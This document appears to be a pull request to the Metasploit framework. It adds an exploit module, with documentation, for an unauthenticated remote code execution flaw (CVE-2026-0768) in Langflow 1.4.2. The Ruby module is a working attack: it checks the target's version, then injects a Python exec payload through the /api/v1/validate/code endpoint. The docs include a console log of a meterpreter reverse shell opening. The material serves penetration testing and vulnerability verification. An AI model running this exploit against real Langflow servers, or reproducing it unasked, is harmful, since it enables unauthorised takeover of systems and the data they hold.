### PR TITLE
ENH: Exploit module for Langflow Unauthenticated Remote Code Execution vulnerability CVE-2026-0768

### DIFF
--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_0768.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_0768.md
@@ -1,0 +1,47 @@
+## Vulnerable Application
+
+Langflow versions 1.4.2 is susceptible to unauthenticated remote code execution
+due to improper handling of the code parameter provided to the /validate endpoint.
+
+The vulnerability affects:
+
+    * Langflow version 1.4.2
+
+
+This module was successfully tested on:
+
+    * Langflow 1.4.2
+
+
+### Installation
+
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Ubuntu Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Langflow docker container (v1.4.2) in your VM.
+   `docker pull langflowai/langflow:1.4.2`
+4. Start the langflow container.
+
+
+```
+sudo docker run -d \
+  --name langflow \
+  -p 192.168.1.30:7860:7860 \
+  langflowai/langflow:1.4.2 \
+```
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_0768`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+ 
+```

--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_0768.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_0768.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-Langflow versions 1.4.2 is susceptible to unauthenticated remote code execution
+Langflow version 1.4.2 is susceptible to unauthenticated remote code execution
 due to improper handling of the code parameter provided to the /validate endpoint.
 
 The vulnerability affects:
@@ -42,6 +42,20 @@ sudo docker run -d \
 
 
 ## Scenarios
+
 ```
- 
+ msf > use multi/http/langflow_unauth_rce_cve_2026_0768
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_0768) > set RHOSTS 192.168.1.30
+RHOSTS => 192.168.1.30
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_0768) > set LHOST 192.168.1.30
+LHOST => 192.168.1.30
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_0768) > exploit
+[*] Started reverse TCP handler on 192.168.1.30:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.4.2 detected, which appears vulnerable.
+[*] Sending stage (34544 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 172.17.0.2:57466) at 2026-09-02 17:59:34 -0400
+
+meterpreter >
 ```

--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_0768.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_0768.md
@@ -1,7 +1,11 @@
 ## Vulnerable Application
 
-Langflow version 1.4.2 is susceptible to unauthenticated remote code execution
-due to improper handling of the code parameter provided to the /validate endpoint.
+ Langflow version 1.4.2 is susceptible to unauthenticated
+ remote code execution due to improper handling of the code
+ parameter provided to the `/validate` endpoint.
+
+ Arbitrary code is executed under the context of the backend
+ Langflow process.
 
 The vulnerability affects:
 
@@ -26,7 +30,7 @@ This module was successfully tested on:
 sudo docker run -d \
   --name langflow \
   -p 192.168.1.30:7860:7860 \
-  langflowai/langflow:1.4.2 \
+  langflowai/langflow:1.4.2
 ```
 
 ## Verification Steps

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_0768.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_0768.rb
@@ -26,8 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'License' => MSF_LICENSE,
         'References' => [
-          ['CVE', '2026-0768'],
-          ['URL', 'https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-0768']
+          ['CVE', '2026-0768']
         ],
         'Targets' => [
           [

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_0768.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_0768.rb
@@ -1,0 +1,109 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Langflow AI Code Injection unauth RCE',
+        'Description' => %q{
+          Langflow versions 1.4.2 is susceptible to
+          unauthenticated remote code execution due to improper handling
+          of the code parameter provided to the /validate endpoint.
+        },
+        'Author' => [
+          'Richard Howe <rhowe425>'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-0768'],
+          ['URL', 'https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-0768']
+        ],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'DisclosureDate' => '2026-09-02',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7860),
+        OptString.new(
+          'TARGETURI',
+          [true, 'Base path of the Langflow application', '/']
+        )
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'api/v1/version')
+      }
+    )
+
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
+
+    doc = res.get_json_document
+    version_str = doc.is_a?(Hash) ? doc['version'] : nil
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version_str
+
+    package = doc.is_a?(Hash) ? doc['package'] : nil
+    return Exploit::CheckCode::Unknown('Failed to identify application.') unless package
+    return Exploit::CheckCode::Safe('Application is not Langflow.') unless package.to_s.downcase == 'langflow'
+
+    version = Rex::Version.new(version_str.to_s)
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
+
+    # Vulnerable version of Langflow
+    return Exploit::CheckCode::Appears("Version #{version} detected, which appears vulnerable.") if version == Rex::Version.new('1.4.2')
+
+    # Patched version of Langflow
+    Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")
+  end
+
+  def exploit
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'api/v1/validate/code'),
+        'headers' => {
+          'Content-Type' => 'application/json',
+          'Authorization' => "Bearer #{token}"
+        },
+        'data' => {
+          'code' => "@exec(\"#{payload.encode}\")\ndef #{rand_text_alpha(6)}():\n    pass"
+        }.to_json
+      }
+    )
+    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res&.code == 200
+  end
+end

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_0768.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_0768.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Langflow AI Code Injection unauth RCE',
         'Description' => %q{
-          Langflow versions 1.4.2 is susceptible to
+          Langflow version 1.4.2 is susceptible to
           unauthenticated remote code execution due to improper handling
           of the code parameter provided to the /validate endpoint.
         },
@@ -96,8 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path, 'api/v1/validate/code'),
         'headers' => {
-          'Content-Type' => 'application/json',
-          'Authorization' => "Bearer #{token}"
+          'Content-Type' => 'application/json'
         },
         'data' => {
           'code' => "@exec(\"#{payload.encode}\")\ndef #{rand_text_alpha(6)}():\n    pass"

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_0768.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_0768.rb
@@ -1,5 +1,3 @@
-# frozen_string_literal: true
-
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -17,9 +15,12 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Langflow AI Code Injection unauth RCE',
         'Description' => %q{
-          Langflow version 1.4.2 is susceptible to
-          unauthenticated remote code execution due to improper handling
-          of the code parameter provided to the /validate endpoint.
+          Langflow version 1.4.2 is susceptible to unauthenticated
+          remote code execution due to improper handling of the code
+          parameter provided to the `/validate` endpoint.
+
+          Arbitrary code is executed under the context of the backend
+          Langflow process.
         },
         'Author' => [
           'Richard Howe <rhowe425>'
@@ -38,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DefaultTarget' => 0,
+        'DefaultOptions' => { 'RPORT' => 7860 },
         'Payload' => {
           'BadChars' => '"'
         },
@@ -52,7 +54,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RPORT(7860),
         OptString.new(
           'TARGETURI',
           [true, 'Base path of the Langflow application', '/']


### PR DESCRIPTION
## Description
This pull request adds a new exploit module that detects and exploits an unauthenticated remote code execution vulnerability impacting Langflow version 1.4.2


**Related Issue:** 
Fixes #21863  

## Breaking Changes
None

## Reviewer Notes


## Verification Steps
1. `docker pull` and `docker run` langflow, per documentation
2. Start msfconsole
3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_0768`
4. Do: `run lhost=<lhost> rhosts=<rhost>`
5. Do: `exploit`
6. You should get a meterpreter session



## Test Evidence
<img width="811" height="248" alt="image" src="https://github.com/user-attachments/assets/418a6ec9-4b86-4f90-919f-25f9d5d17d0f" />


## Environment

| Field | Details |
|-------|---------|
| **Operating System** |  Ubuntu 22.04 |
| **Target Software/Hardware** | langflow 1.4.2 |
| **Docker Image / Vagrant Setup** | langflowai/langflow:1.4.2 |

## AI Usage Disclosure
None


## Pre-Submission Checklist

- [X] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [X] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [X] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [X] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)